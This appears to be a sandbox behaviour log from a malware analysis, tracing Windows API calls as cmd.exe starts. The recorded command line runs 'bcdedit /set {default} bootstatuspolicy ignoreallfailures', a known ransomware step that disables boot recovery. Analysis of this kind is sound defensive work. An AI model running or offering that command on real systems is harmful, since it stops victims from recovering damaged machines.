os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e6e5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 17 os_tid = 0xb64 [0046.165] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x22f810 | out: lpSystemTimeAsFileTime=0x22f810*(dwLowDateTime=0x1a671020, dwHighDateTime=0x1d5e3d9)) [0046.165] GetCurrentProcessId () returned 0xb70 [0046.165] GetCurrentThreadId () returned 0xb64 [0046.165] GetTickCount () returned 0x11564cc [0046.165] QueryPerformanceCounter (in: lpPerformanceCount=0x22f818 | out: lpPerformanceCount=0x22f818*=18808726467) returned 1 [0046.166] GetModuleHandleW (lpModuleName=0x0) returned 0x49eb0000 [0046.166] __set_app_type (_Type=0x1) [0046.167] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x49ed7810) returned 0x0 [0046.167] __getmainargs (in: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610, _DoWildCard=0, _StartInfo=0x49ede0f4 | out: _Argc=0x49efa608, _Argv=0x49efa618, _Env=0x49efa610) returned 0 [0046.167] GetCurrentThreadId () returned 0xb64 [0046.167] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xb64) returned 0x3c [0046.167] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.167] GetProcAddress (hModule=0x76f20000, lpProcName="SetThreadUILanguage") returned 0x76f36d40 [0046.167] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0046.167] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0046.167] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x22f7a8 | out: phkResult=0x22f7a8*=0x0) returned 0x2 [0046.168] VirtualQuery (in: lpAddress=0x22f790, lpBuffer=0x22f710, dwLength=0x30 | out: lpBuffer=0x22f710*(BaseAddress=0x22f000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.168] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x22f710, dwLength=0x30 | out: lpBuffer=0x22f710*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.168] VirtualQuery (in: lpAddress=0x131000, lpBuffer=0x22f710, dwLength=0x30 | out: lpBuffer=0x22f710*(BaseAddress=0x131000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x3000, State=0x1000, Protect=0x104, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.168] VirtualQuery (in: lpAddress=0x134000, lpBuffer=0x22f710, dwLength=0x30 | out: lpBuffer=0x22f710*(BaseAddress=0x134000, AllocationBase=0x130000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0xfc000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30 [0046.168] VirtualQuery (in: lpAddress=0x230000, lpBuffer=0x22f710, dwLength=0x30 | out: lpBuffer=0x22f710*(BaseAddress=0x230000, AllocationBase=0x0, AllocationProtect=0x0, __alignment1=0x0, RegionSize=0xb0000, State=0x10000, Protect=0x1, Type=0x0, __alignment2=0x0)) returned 0x30 [0046.168] GetConsoleOutputCP () returned 0x1b5 [0046.168] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.168] SetConsoleCtrlHandler (HandlerRoutine=0x49ed3184, Add=1) returned 1 [0046.168] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.168] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0046.168] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.168] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49ede194 | out: lpMode=0x49ede194) returned 1 [0046.169] _get_osfhandle (_FileHandle=1) returned 0x7 [0046.169] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0046.169] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.169] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49ede198 | out: lpMode=0x49ede198) returned 1 [0046.169] _get_osfhandle (_FileHandle=0) returned 0x3 [0046.169] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0046.169] GetEnvironmentStringsW () returned 0x2f8b80* [0046.169] GetProcessHeap () returned 0x2e0000 [0046.169] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2f9610 [0046.169] FreeEnvironmentStringsW (penv=0x2f8b80) returned 1 [0046.170] GetProcessHeap () returned 0x2e0000 [0046.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x8) returned 0x2f8a00 [0046.170] GetEnvironmentStringsW () returned 0x2f8b80* [0046.170] GetProcessHeap () returned 0x2e0000 [0046.170] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa7c) returned 0x2fa0a0 [0046.170] FreeEnvironmentStringsW (penv=0x2f8b80) returned 1 [0046.170] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e668 | out: phkResult=0x22e668*=0x44) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x18, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x1, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x1, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x0, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x40, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x40, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x40, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.170] RegCloseKey (hKey=0x44) returned 0x0 [0046.170] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x22e668 | out: phkResult=0x22e668*=0x44) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x40, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x1, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x1, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x0, lpcbData=0x22e664*=0x4) returned 0x0 [0046.170] RegQueryValueExW (in: hKey=0x44, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x9, lpcbData=0x22e664*=0x4) returned 0x0 [0046.171] RegQueryValueExW (in: hKey=0x44, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x4, lpData=0x22e680*=0x9, lpcbData=0x22e664*=0x4) returned 0x0 [0046.171] RegQueryValueExW (in: hKey=0x44, lpValueName="AutoRun", lpReserved=0x0, lpType=0x22e660, lpData=0x22e680, lpcbData=0x22e664*=0x1000 | out: lpType=0x22e660*=0x0, lpData=0x22e680*=0x9, lpcbData=0x22e664*=0x1000) returned 0x2 [0046.171] RegCloseKey (hKey=0x44) returned 0x0 [0046.171] time (in: timer=0x0 | out: timer=0x0) returned 0x5e47aa56 [0046.171] srand (_Seed=0x5e47aa56) [0046.171] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6037086|bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0046.171] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /C title 6037086|bcdedit /set {default} bootstatuspolicy ignoreallfailures" [0046.171] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.171] GetProcessHeap () returned 0x2e0000 [0046.171] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x218) returned 0x2fab30 [0046.171] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2fab40, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0046.171] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0046.171] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0046.171] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.171] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0046.171] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0046.171] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0046.171] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0046.171] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0046.171] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0046.171] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0046.171] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0046.172] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0046.172] GetProcessHeap () returned 0x2e0000 [0046.172] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2f9610 | out: hHeap=0x2e0000) returned 1 [0046.172] GetEnvironmentStringsW () returned 0x2f8b80* [0046.172] GetProcessHeap () returned 0x2e0000 [0046.172] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa94) returned 0x2fad50 [0046.172] FreeEnvironmentStringsW (penv=0x2f8b80) returned 1 [0046.172] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.172] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x49edf360, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0046.172] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0046.172] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0046.172] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0046.172] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0046.172] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0046.172] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0046.172] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0046.172] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0046.172] GetProcessHeap () returned 0x2e0000 [0046.172] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x5c) returned 0x2fb7f0 [0046.172] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x22f470 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.172] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x22f470, lpFilePart=0x22f450 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x22f450*="Desktop") returned 0x25 [0046.172] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.172] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x22f180 | out: lpFindFileData=0x22f180*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Users", cAlternateFileName="")) returned 0x2fb860 [0046.172] FindClose (in: hFindFile=0x2fb860 | out: hFindFile=0x2fb860) returned 1 [0046.173] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x22f180 | out: lpFindFileData=0x22f180*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2914fe20, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2914fe20, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x2fb860 [0046.173] FindClose (in: hFindFile=0x2fb860 | out: hFindFile=0x2fb860) returned 1 [0046.173] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0046.173] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x22f180 | out: lpFindFileData=0x22f180*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x13408ec0, ftLastAccessTime.dwHighDateTime=0x1d5e3d9, ftLastWriteTime.dwLowDateTime=0x13408ec0, ftLastWriteTime.dwHighDateTime=0x1d5e3d9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x53000152, cFileName="Desktop", cAlternateFileName="")) returned 0x2fb860 [0046.173] FindClose (in: hFindFile=0x2fb860 | out: hFindFile=0x2fb860) returned 1 [0046.173] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0046.173] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0046.173] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0046.173] GetProcessHeap () returned 0x2e0000 [0046.173] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fad50 | out: hHeap=0x2e0000) returned 1 [0046.173] GetEnvironmentStringsW () returned 0x2fb860* [0046.173] GetProcessHeap () returned 0x2e0000 [0046.173] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xae8) returned 0x2fc350 [0046.173] FreeEnvironmentStringsW (penv=0x2fb860) returned 1 [0046.173] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49eec0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0046.173] GetProcessHeap () returned 0x2e0000 [0046.173] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fb7f0 | out: hHeap=0x2e0000) returned 1 [0046.173] GetProcessHeap () returned 0x2e0000 [0046.173] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4016) returned 0x2fce40 [0046.174] GetProcessHeap () returned 0x2e0000 [0046.174] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xa4) returned 0x2f9670 [0046.174] GetProcessHeap () returned 0x2e0000 [0046.174] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fce40 | out: hHeap=0x2e0000) returned 1 [0046.174] GetConsoleOutputCP () returned 0x1b5 [0046.174] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49eebfe0 | out: lpCPInfo=0x49eebfe0) returned 1 [0046.174] GetUserDefaultLCID () returned 0x409 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x49ee7b50, cchData=8 | out: lpLCData=":") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x22f580, cchData=128 | out: lpLCData="0") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x22f580, cchData=128 | out: lpLCData="0") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x22f580, cchData=128 | out: lpLCData="1") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x49efa740, cchData=8 | out: lpLCData="/") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x49efa4a0, cchData=32 | out: lpLCData="Mon") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x49efa460, cchData=32 | out: lpLCData="Tue") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x49efa420, cchData=32 | out: lpLCData="Wed") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x49efa3e0, cchData=32 | out: lpLCData="Thu") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x49efa3a0, cchData=32 | out: lpLCData="Fri") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x49efa360, cchData=32 | out: lpLCData="Sat") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x49efa700, cchData=32 | out: lpLCData="Sun") returned 4 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x49ee7b40, cchData=8 | out: lpLCData=".") returned 2 [0046.175] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x49efa4e0, cchData=8 | out: lpLCData=",") returned 2 [0046.175] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0046.176] GetProcessHeap () returned 0x2e0000 [0046.176] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x0, Size=0x20c) returned 0x2f9790 [0046.176] GetConsoleTitleW (in: lpConsoleTitle=0x2f9790, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0046.176] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76f20000 [0046.176] GetProcAddress (hModule=0x76f20000, lpProcName="CopyFileExW") returned 0x76f323d0 [0046.176] GetProcAddress (hModule=0x76f20000, lpProcName="IsDebuggerPresent") returned 0x76f28290 [0046.176] GetProcAddress (hModule=0x76f20000, lpProcName="SetConsoleInputExeNameW") returned 0x76f317e0 [0046.176] GetProcessHeap () returned 0x2e0000 [0046.176] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4012) returned 0x2fce40 [0046.177] GetProcessHeap () returned 0x2e0000 [0046.177] HeapFree (in: hHeap=0x2e0000, dwFlags=0x0, lpMem=0x2fce40 | out: hHeap=0x2e0000) returned 1 [0046.177] _wcsicmp (_String1="title", _String2=")") returned 75 [0046.177] _wcsicmp (_String1="FOR", _String2="title") returned -14 [0046.177] _wcsicmp (_String1="FOR/?", _String2="title") returned -14 [0046.177] _wcsicmp (_String1="IF", _String2="title") returned -11 [0046.177] _wcsicmp (_String1="IF/?", _String2="title") returned -11 [0046.177] _wcsicmp (_String1="REM", _String2="title") returned -2 [0046.177] _wcsicmp (_String1="REM/?", _String2="title") returned -2 [0046.177] GetProcessHeap () returned 0x2e0000 [0046.177] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f99b0 [0046.177] GetProcessHeap () returned 0x2e0000 [0046.177] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x1c) returned 0x2f46b0 [0046.178] GetProcessHeap () returned 0x2e0000 [0046.178] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x22) returned 0x2f46e0 [0046.178] GetProcessHeap () returned 0x2e0000 [0046.178] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f9a70 [0046.178] _wcsicmp (_String1="FOR", _String2="bcdedit") returned 4 [0046.178] _wcsicmp (_String1="FOR/?", _String2="bcdedit") returned 4 [0046.178] _wcsicmp (_String1="IF", _String2="bcdedit") returned 7 [0046.178] _wcsicmp (_String1="IF/?", _String2="bcdedit") returned 7 [0046.178] _wcsicmp (_String1="REM", _String2="bcdedit") returned 16 [0046.178] _wcsicmp (_String1="REM/?", _String2="bcdedit") returned 16 [0046.178] GetProcessHeap () returned 0x2e0000 [0046.178] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0xb0) returned 0x2f9b30 [0046.178] GetProcessHeap () returned 0x2e0000 [0046.179] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x20) returned 0x2f4710 [0046.179] GetProcessHeap () returned 0x2e0000 [0046.179] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x76) returned 0x2f9bf0 [0046.180] GetProcessHeap () returned 0x2e0000 [0046.180] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x48) returned 0x2f9c70 [0046.180] _pipe (in: _PtHandles=0x2f9c80, _PipeSize=0x0, _TextMode=32768 | out: _PtHandles=0x2f9c80) returned 0 [0046.180] _dup (_FileHandle=1) returned 5 [0046.241] _dup2 (_FileHandleSrc=4, _FileHandleDst=1) returned 0 [0046.241] _close (_FileHandle=4) returned 0 [0046.242] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.242] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.242] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.242] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.242] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.242] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.242] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.242] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.242] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.242] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.242] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.242] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.242] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.242] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.242] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.242] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.242] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.242] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.242] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.242] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.242] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.242] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.242] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.242] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.242] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.242] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.242] GetProcessHeap () returned 0x2e0000 [0046.242] RtlAllocateHeap (HeapHandle=0x2e0000, Flags=0x8, Size=0x4010) returned 0x2fce40 [0046.242] _wcsicmp (_String1="title", _String2="DIR") returned 16 [0046.242] _wcsicmp (_String1="title", _String2="ERASE") returned 15 [0046.242] _wcsicmp (_String1="title", _String2="DEL") returned 16 [0046.242] _wcsicmp (_String1="title", _String2="TYPE") returned -16 [0046.242] _wcsicmp (_String1="title", _String2="COPY") returned 17 [0046.242] _wcsicmp (_String1="title", _String2="CD") returned 17 [0046.243] _wcsicmp (_String1="title", _String2="CHDIR") returned 17 [0046.243] _wcsicmp (_String1="title", _String2="RENAME") returned 2 [0046.243] _wcsicmp (_String1="title", _String2="REN") returned 2 [0046.243] _wcsicmp (_String1="title", _String2="ECHO") returned 15 [0046.243] _wcsicmp (_String1="title", _String2="SET") returned 1 [0046.243] _wcsicmp (_String1="title", _String2="PAUSE") returned 4 [0046.243] _wcsicmp (_String1="title", _String2="DATE") returned 16 [0046.243] _wcsicmp (_String1="title", _String2="TIME") returned 7 [0046.243] _wcsicmp (_String1="title", _String2="PROMPT") returned 4 [0046.243] _wcsicmp (_String1="title", _String2="MD") returned 7 [0046.243] _wcsicmp (_String1="title", _String2="MKDIR") returned 7 [0046.243] _wcsicmp (_String1="title", _String2="RD") returned 2 [0046.243] _wcsicmp (_String1="title", _String2="RMDIR") returned 2 [0046.243] _wcsicmp (_String1="title", _String2="PATH") returned 4 [0046.243] _wcsicmp (_String1="title", _String2="GOTO") returned 13 [0046.243] _wcsicmp (_String1="title", _String2="SHIFT") returned 1 [0046.243] _wcsicmp (_String1="title", _String2="CLS") returned 17 [0046.243] _wcsicmp (_String1="title", _String2="CALL") returned 17 [0046.243] _wcsicmp (_String1="title", _String2="VERIFY") returned -2 [0046.243] _wcsicmp (_String1="title", _String2="VER") returned -2 [0046.243] _wcsicmp (_String1="title", _String2="VOL") returned -2 [0046.243] _wcsicmp (_String1="title", _String2="EXIT") returned 15 [0046.243] _wcsicmp (_String1="title", _String2="SETLOCAL") returned 1 [0046.243] _wcsicmp (_String1="title", _String2="ENDLOCAL") returned 15 [0046.243] _wcsicmp (_String1="title", _String2="TITLE") returned 0 [0046.243] GetProcessHeap () returned 0x2e0000 